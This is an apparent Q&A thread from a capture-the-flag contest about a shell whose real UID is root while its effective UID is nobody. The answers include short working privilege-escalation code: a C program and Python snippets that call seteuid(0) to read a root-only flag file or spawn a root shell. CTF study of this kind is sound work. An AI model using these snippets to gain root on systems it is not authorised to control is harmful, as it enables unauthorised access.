# UID is root but whoami says nobody

Tags: linux, permissions, root, uid

I'm participating in a capture-the-flag contest where I must implement some form of privilege escalation to read the `flag.txt` file. I've noticed that when I run `whoami` I get the following result:

```
myHostHere:/$ whoami
nobody
```

But when I run `id` my UID is set to `root`:

```
myHostHere:/$ id
uid=0(root) gid=65534(nobody) euid=65534(nobody)
```

Does this mean it's possible for me to act as a root user, etc or am I misinterpreting the output?

**Edit:**

The output of `ls -l flag.txt` is as follows:

```
-r--r-----    1 root     root            34 Feb 10 12:00 flag.txt
```

Comment: This can be helpful: https://unix.stackexchange.com/a/191955/53467

Comment: @gronostaj so am I correct in saying that my current shell process (sh) was created by 'root' but all actions executed withing this shell have the privileges of 'nobody'?

Comment: I'm not sure. Try `ls -l $(which whoami)`, maybe it has setuid bit enabled. Or maybe your shell does.

Comment: Neither ```sh``` nor ```whoami``` have the setuid bit enabled (I also did a ```find / -perm /2000``` previously which returned nothing).

Comment: Please [edit] the question and post the output of `ls -l flag.txt`.

Answer (score 1):

This can be solved by writing and compiling (with `--static`) a C program like so on a separate machine:

```
#include<stdio.h>
#include<stdlib.h>
#include<unistd.h>
void main() {
    seteuid(0);
    setgid(0);
    system("cat flag.txt");
}
```

This file can be copied over to the CTF machine, given permission to execute with `chmod +x`, and run from the `tmp` folder.

Comment: Note the architecture must match.

Answer (score 0):

I created a setup very similar to yours. I did it with a debugger (examples: [here](https://superuser.com/a/68942/432690) and [there](https://unix.stackexchange.com/a/208623/108618)). In the affected shell I have:

```
$ whoami
nobody
$ id
uid=0(root) gid=65534(nogroup) euid=65534(nobody) groups=65534(nogroup)
$
```

Then, according to [this answer](https://unix.stackexchange.com/a/399801/108618):

> File access, and operations that require root privileges, look at the effective UID and GID.

Indeed, this is what happens:

```
$ ls -l flag.txt
---------- 1 root root 4 Mar 17 08:57 flag.txt
$ cat flag.txt
cat: flag.txt: Permission denied
$
```

But I can do this:

```
$ sudo cat flag.txt
foo
```

Or this:

```
$ su -
# whoami
root
# cat flag.txt
foo
```

Or this:

```
$ sg root 'cat flag.txt'
foo
```

---

When you have `uid=0`, anything that can use `seteuid` system call and then read the file can help you. E.g. `python`:

```
import os
os.seteuid(0)
f = open('flag.txt', 'r')
print f.read()
f.close()
```

Instead of (or aside of) reading the file you can spawn an elevated shell:

```
import os
os.seteuid(0)
os.execve("/bin/sh", [], {})
```

In this shell you're `root`; `cat flag.txt` will work.

---

<sup>Testbed: Debian GNU/Linux 9.</sup>

Comment: Unfortunately the system in question does not have ```sudo```, ```gdb```, etc. installed (and installation requires root permissions) and any attempted usage of ```su``` throws the following error: ```su: can't set groups: Operation not permitted```.

Comment: @JamesDiamond Is there anything that can call `seteuid`? Compare the Python example in the now expanded answer.